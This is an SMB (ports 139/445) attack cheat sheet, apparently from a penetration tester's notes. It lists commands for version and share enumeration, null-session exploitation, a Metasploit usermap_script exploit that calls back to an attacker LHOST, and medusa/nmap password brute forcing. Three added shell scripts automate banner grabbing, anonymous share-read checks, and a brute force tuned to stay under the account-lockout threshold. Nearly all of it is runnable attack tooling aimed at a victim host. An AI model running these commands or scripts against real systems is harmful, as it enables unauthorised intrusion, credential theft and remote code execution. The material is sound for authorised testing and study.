SMB - 139/445

Sheet columns: Categories | OS | Tool | Intent | Command | Comments. Every row carries the category "139/445 - smb", so each row below is listed as "row. Intent (OS, tool)", followed by the command and then the comments.

3. Enumerate hostname (Linux, nmblookup)
   nmblookup -A <victim_ip>

4. Enumerate hostname (Linux, enum4linux)
   enum4linux -n <victim_ip>
   Samba 2.2.x versions are a red flag.
5. Quick enumeration (Linux / Windows, nmap)
   nmap --script=smb-enum* --script-args=unsafe=1 -T5 <victim_ip>
   -T5 is the most aggressive timing template and drops results on lossy links; -T4 is the safer choice.

6. Get version (Linux, smbver script)
   smbver.sh <victim_ip>
   Script used to get the SMB version if nmap fails.

7. Get version (Linux, Metasploit)
   msfconsole
   msf> use auxiliary/scanner/smb/smb_version
   msf> set RHOSTS <victim_ip>
   msf> run
   Metasploit module to get the SMB version.

8. Get version (Linux, ngrep)
   ngrep -i -d tap0 's.?a.?m.?b.?a.*[[:digit:]]'
   smbclient -L \\\\<victim_ip>
   Manual method if all else fails: run ngrep in one terminal (tap0 is the interface facing the target; change it to yours), then trigger a connection with smbclient in another. The regex allows a byte between the letters because the banner is sent as UTF-16LE. Only the SMB1 session setup carries the version string, so on targets that negotiate SMB2/3 only this shows nothing.

9. Get version (Linux / Windows, Wireshark)
   #1: run Wireshark
   #2: smbmap -H <victim_ip>
   #3: follow the TCP stream of the SMB negotiation
   noted by 1kwstassak on reddit.com
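Rows 6 to 9 all rest on the same detail: the Samba version only appears in the SMB1 session setup, as a UTF-16LE string. The script below is an added example, not the sheet's smbver.sh and not any tool's own code; it automates the manual ngrep/smbclient method with tcpdump and strings, then maps the banner to the hints this sheet gives. The interface name eth0, the tcpdump/strings/smbclient invocations, the sample banner lines and the 3.0.20-3.0.25rc3 range (taken from the usermap_script module's description, not from the sheet) are assumptions.

```shell
#!/bin/sh
# smb-banner.sh <victim_ip> [iface]
# Added example: grab the SMB1 NativeOS/NativeLanMan banner (where Samba puts
# its version) and map it to the hints on this sheet. Not the page's smbver.sh.
# With no argument it runs on the constructed sample below.

# Constructed sample of what `strings -e l` returns for a Samba 3.0.20 host;
# not captured from a real target.
SAMPLE_STRINGS='Unix
Samba 3.0.20-Debian
WORKGROUP'

# Pull the first "Samba <version>" string out of text on stdin. Works on
# strings(1) output from a capture, on smbclient output, or on nmap output.
extract_samba_version() {
    grep -aoE 'Samba [0-9]+\.[0-9]+\.[0-9]+[-0-9A-Za-z.~_]*' | head -n 1
}

# Same for a Windows NativeOS string such as "Windows 5.1" or
# "Windows Server 2003 3790 Service Pack 2".
extract_windows_os() {
    grep -aoE 'Windows (Server )?[0-9][0-9A-Za-z .]*' | head -n 1 | sed 's/[[:space:]]*$//'
}

# What this sheet says about a Samba banner. The 2.2.x rule is row 4; the
# 3.0.20-3.0.25rc3 range is the documented target of
# exploit/multi/samba/usermap_script (row 33), an assumption added here.
version_hint() {
    case "$1" in
        "Samba 2.2."*)        echo "red flag: Samba 2.2.x (row 4)" ;;
        "Samba 3.0.2"[0-5]*)  echo "candidate for exploit/multi/samba/usermap_script (3.0.20-3.0.25rc3, row 33)" ;;
        "Samba "*)            echo "no version-specific hint; run smb-vuln* (row 30) and smb_checks.rc (row 31)" ;;
        *)                    echo "not a Samba banner" ;;
    esac
}

# Live path: capture while smbclient negotiates SMB1, then decode the strings.
# Assumes tcpdump (run as root), strings (binutils) and smbclient are installed.
grab_banner() {
    target=$1
    iface=${2:-eth0}                      # assumption: interface facing the target
    cap=$(mktemp) || return 1
    tcpdump -i "$iface" -s 0 -w "$cap" "host $target and (port 139 or port 445)" 2>/dev/null &
    tpid=$!
    sleep 1
    # Force SMB1: only the SMB1 session setup carries NativeOS/NativeLanMan.
    # SMB2/3 have no such fields, which is why this draws a blank on hosts
    # that have SMB1 disabled.
    smbclient -L "//$target" -N --max-protocol=NT1 \
        --option='client min protocol=NT1' >/dev/null 2>&1 || true
    sleep 1
    kill "$tpid" 2>/dev/null || true
    wait "$tpid" 2>/dev/null || true
    # Unicode-capable servers send the banner as UTF-16LE (the reason the
    # ngrep regex on this sheet allows a byte between letters): strings -e l
    # decodes that, plain strings covers servers that answer in ASCII.
    { strings -e l "$cap"; strings "$cap"; } 2>/dev/null
    rm -f "$cap"
}

# Print what was found in a block of banner text.
report() {
    samba=$(printf '%s\n' "$1" | extract_samba_version)
    win=$(printf '%s\n' "$1" | extract_windows_os)
    printf 'Samba banner : %s\n' "${samba:-none}"
    printf 'Windows OS   : %s\n' "${win:-none}"
    printf 'Hint         : %s\n' "$(version_hint "${samba:-none}")"
}

# Only touch the network when a target is given.
if [ $# -gt 0 ]; then
    report "$(grab_banner "$1" "${2-}")"
else
    report "$SAMPLE_STRINGS"
fi
```

Run it as root with the target and the capture interface (`./smb-banner.sh 10.10.10.3 tap0`); without arguments it prints the analysis of the constructed sample so the parsing can be checked offline.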
10. Get shares (Linux, smbmap)
    smbmap -H <victim_ip> -R <sharename>
    Recursively list the files in a specific share.

11. Get shares (Linux, smbclient)
    echo exit | smbclient -L \\\\$ip
    Piping "exit" feeds the password prompt so smbclient does not hang waiting for input; -N (row 13) is the cleaner way.

12. Connect to a share (Linux, smbclient)
    smbclient \\\\<victim_ip>\\<share>
    More details in the cherrytree file (1.information gathering > Active > Enumeration > Services > 139.SMB).

13. Get shares (Linux, smbclient)
    smbclient -L //<victim_ip> -N
    -N: do not prompt for a password (null session).

14. Get shares (Linux / Windows, nmap)
    nmap --script smb-enum-shares -p139,445 -T4 -Pn <victim_ip>

15. Get shares (Linux, smbclient)
    smbclient -L \\\\<victim_ip>\\
    More details in the cherrytree file (1.information gathering > Active > Enumeration > Services > 139.SMB).
16. Check null sessions (Linux, smbmap)
    smbmap -H <victim_ip>
    Null-session behaviour by version:
    Windows NT, 2000 and XP (most SMB1): VULNERABLE, null sessions can be created by default.
    Windows 2003, and XP SP2 onwards: NOT VULNERABLE, null sessions cannot be created by default.
    Most Samba (Unix) servers: commonly allow null sessions, but it depends on the smb.conf, so test rather than assume.

17. Check null sessions (Linux, rpcclient)
    rpcclient -U "" -N $ip

18. Check null sessions (Linux, smbclient)
    smbclient //<victim_ip>/IPC$ -N
    Success looks like an "smb: \>" prompt.
19. Exploit null sessions (Linux, enum)
    enum -s <victim_ip>
    -s: enumerate the shares of a machine.

20. Exploit null sessions (Linux, enum)
    enum -U <victim_ip>
    -U: enumerate users.

21. Exploit null sessions (Linux, enum)
    enum -P <victim_ip>
    -P: check the password policy. Do this before any brute force: the lockout threshold decides how many guesses per user are safe.

22. Exploit null sessions (Linux, enum4linux)
    enum4linux -a <victim_ip>
    -a: use all enumeration switches (users, shares, password policy, ...).

23. Exploit null sessions (Linux, samrdump.py)
    Using /usr/share/doc/python3-impacket/examples/samrdump.py:
    ./samrdump.py <victim_ip>
    Without credentials it tries an anonymous (null) SAMR connection and dumps the users it can see.
24. Connect to a share with a username (Linux, smbclient)
    smbclient //$ip/share -U username
    This step requires credentials; smbclient prompts for the password (or pass it inline as -U 'username%password').

25. Connect to a share anonymously (Linux, smbclient)
    smbclient \\\\<victim_ip>\\<share>
    Example: smbclient \\\\<victim_ip>\\IPC$
    More details in the cherrytree file (1.information gathering > Active > Enumeration > Services > 139.SMB).

26. Connect to a share anonymously (Linux, smbclient)
    smbclient //<victim_ip>/<share>

27. Connect to a share anonymously (Linux, smbclient)
    smbclient "//<victim_ip>/<share name>"
    smbclient //<victim_ip>/<share\ name>
    If the share name has a space in it (e.g. "My Shares"), quote it or escape the space.

28. Connect to a share anonymously (Linux, rpcclient)
    rpcclient -U "" <victim_ip>
    Press Enter at the password prompt. Connects to the null share (IPC$); enumerate with rpcclient commands such as srvinfo, enumdomusers and querydominfo, refer to OneNote.

29. Connect to a share anonymously (Linux, rpcclient)
    rpcclient -U "" -N <victim_ip>
    Same as row 28, with -N suppressing the password prompt.
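Rows 10 to 15 list the shares and rows 25 to 27 open them one at a time, quoting names that contain spaces. The script below is an added example, not from this sheet or from smbclient: it parses the `smbclient -L` listing, keeps the Disk shares, and tries an anonymous `ls` on each, so the null-session check (rows 16 to 18) and the per-share read test run in one pass. The listing sample is constructed, modelled on a Samba 3.x server, and the NT_STATUS strings are the ones smbclient prints; everything else (file name, output layout) is an assumption.

```shell
#!/bin/sh
# null-shares.sh [victim_ip]
# Added example (not from the page or any tool): list shares over a null
# session, then test each Disk share for anonymous read, quoting names that
# contain spaces. With no argument it parses the constructed sample below.

# Constructed sample of `smbclient -L //<victim_ip> -N` output, modelled on a
# Samba 3.x listing; not captured from a real host.
SAMPLE_LISTING='
        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        tmp             Disk      oh noes!
        opt             Disk
        My Shares       Disk      Disk images
        IPC$            IPC       IPC Service (sample server)
        ADMIN$          IPC       IPC Service (sample server)
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            SAMPLE
'

# Turn a listing into "name<TAB>type" lines. The name may contain spaces
# ("My Shares"), so scan for the first token that is a share type and treat
# everything before it as the name.
parse_shares() {
    awk '
        /^[[:space:]]*(Sharename|-)/ { next }
        {
            for (i = 2; i <= NF; i++) {
                if ($i == "Disk" || $i == "IPC" || $i == "Printer") {
                    name = $1
                    for (j = 2; j < i; j++) name = name " " $j
                    print name "\t" $i
                    break
                }
            }
        }'
}

# Only Disk shares are worth an anonymous read attempt (IPC$ is the null
# session itself, row 18).
disk_shares() {
    parse_shares | awk -F'\t' '$2 == "Disk" { print $1 }'
}

# Classify one `smbclient //ip/share -N -c ls` attempt from its exit status
# and output. The NT_STATUS names are the ones smbclient prints.
classify_access() {
    status=$1
    output=$2
    case "$output" in
        *NT_STATUS_ACCESS_DENIED*)      echo denied ;;
        *NT_STATUS_BAD_NETWORK_NAME*)   echo no-such-share ;;
        *NT_STATUS_LOGON_FAILURE*)      echo null-session-refused ;;
        *) if [ "$status" -eq 0 ]; then echo readable; else echo error; fi ;;
    esac
}

# Live path: list shares anonymously and try to read every Disk share.
check_target() {
    target=$1
    smbclient -L "//$target" -N 2>&1 | disk_shares | while IFS= read -r share; do
        # Double quotes keep "My Shares" as one share name (row 27).
        output=$(smbclient "//$target/$share" -N -c ls 2>&1)
        status=$?
        printf '%-24s %s\n' "$share" "$(classify_access "$status" "$output")"
    done
}

if [ $# -gt 0 ]; then
    check_target "$1"
else
    printf '%s\n' "$SAMPLE_LISTING" | parse_shares
fi
```

The scan for the type token, rather than a fixed column split, is what makes "My Shares" survive; a share whose comment mentions "Disk" is still handled because the first type token wins.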
30. Check vulns (Linux / Windows, nmap)
    nmap --script smb-vuln* -p139,445 -T4 -Pn <victim_ip>
    Some of these scripts (smb-vuln-ms08-067 among them) only run with --script-args=unsafe=1 and can crash the target; get agreement before using that on a production host.

31. Check common security concerns (Linux / Windows, Metasploit)
    msf> resource smb_checks.rc
    or
    msfconsole -r /usr/share/metasploit-framework/scripts/resource/smb_checks.rc
    This resource script checks common security concerns on SMB for Windows. Specifically, it checks for:
    MS08-067
    MS17-010
    SMB version 1

32. Extra validation (Linux / Windows, Metasploit)
    msf> resource smb_validate.rc
    or
    msfconsole -r /usr/share/metasploit-framework/scripts/resource/smb_validate.rc
    Run after the previous check.

33. Multi exploit (Linux / Windows, Metasploit)
    msfconsole
    msf> use exploit/multi/samba/usermap_script
    msf> set LHOST 192.168.0.X
    msf> set RHOSTS $ip
    msf> run
    Only applies to Samba 3.0.20 through 3.0.25rc3; confirm the version first (rows 6 to 9).
34. Brute force login (Linux, nmap / medusa)
    After enumerating users (rows 20 to 23) you can brute force the login:
    medusa -h <victim_ip> -u userhere -P /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt -M smbnt
    nmap -p445 --script smb-brute --script-args userdb=userfilehere,passdb=/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt <victim_ip> -vvvv
    nmap -p445 --script smb-brute <victim_ip>
    Read the password policy first (rows 21 and 22): with an account lockout threshold set, a large wordlist locks out every enumerated user.
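Rows 20 to 23 give the user list and the password policy, and row 34 spends them on a brute force; the step this sheet leaves implicit is using the lockout threshold to size the guess list. The script below is an added example, not the sheet's own tooling or any tool's code: it turns the null session into users.txt, reads the lockout threshold, and only then runs nmap smb-brute with a budget that stays under it. The rpcclient and polenum-style sample outputs are constructed, and the wordlist path, output file names and the "2 guesses when the policy is unknown" rule are assumptions.

```shell
#!/bin/sh
# null-to-brute.sh [victim_ip] [wordlist]
# Added example (not the page's own tooling): use the null session to build a
# user list (rows 20-23), read the lockout threshold from the password policy
# (rows 21-22), then run nmap smb-brute (row 34) inside a guess budget that
# will not lock the accounts. With no argument it runs on the samples below.

# Constructed sample of `rpcclient -c enumdomusers` output.
SAMPLE_USERS='user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[bob] rid:[0x3e8]'

# Constructed sample of the policy lines enum4linux -P (polenum) prints.
SAMPLE_POLICY='[+] Minimum password length: 7
[+] Password history length: 24
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: 5
[+] Forced Log off Time: Not Set'

# "user:[bob] rid:[0x3e8]" -> "bob"
users_from_enumdomusers() {
    sed -n 's/^user:\[\([^]]*\)].*/\1/p'
}

# Print the lockout threshold: N, 0 when the line says None (no lockout),
# -1 when no such line was found (policy unknown).
lockout_threshold() {
    awk -F': *' '
        /Account Lockout Threshold/ {
            v = $2
            sub(/[^0-9].*$/, "", v)
            n = (v == "" ? 0 : v) + 0
            print n
            found = 1
        }
        END { if (!found) print -1 }'
}

# Guesses per user that are safe: one below the threshold, "unlimited" when
# there is no lockout, and a conservative 2 (assumption) when the policy is
# unknown.
guess_budget() {
    t=$1
    if [ "$t" -eq 0 ]; then echo unlimited
    elif [ "$t" -lt 0 ]; then echo 2
    else echo $((t - 1))
    fi
}

# Live path: enumerate, size the wordlist, brute force.
run() {
    target=$1
    wordlist=${2:-/usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt}
    rpcclient -U "" -N "$target" -c enumdomusers | users_from_enumdomusers > users.txt
    threshold=$(enum4linux -P "$target" 2>/dev/null | lockout_threshold)
    budget=$(guess_budget "$threshold")
    printf 'users: %s  lockout threshold: %s  budget per user: %s\n' \
        "$(wc -l < users.txt | tr -d ' ')" "$threshold" "$budget"
    if [ "$budget" = unlimited ]; then
        nmap -p445 --script smb-brute --script-args "userdb=users.txt,passdb=$wordlist" "$target"
    elif [ "$budget" -gt 0 ]; then
        head -n "$budget" "$wordlist" > passdb.txt
        nmap -p445 --script smb-brute --script-args userdb=users.txt,passdb=passdb.txt "$target"
    else
        echo "threshold $threshold leaves no safe guesses; do not brute force" >&2
    fi
}

if [ $# -gt 0 ]; then
    run "$@"
else
    printf '%s\n' "$SAMPLE_USERS" | users_from_enumdomusers
    t=$(printf '%s\n' "$SAMPLE_POLICY" | lockout_threshold)
    printf 'lockout threshold %s -> budget %s guesses per user\n' "$t" "$(guess_budget "$t")"
fi
```

The budget is per user because smb-brute tries every password in passdb against every user in userdb; trimming the password list with head is what keeps each account below the threshold.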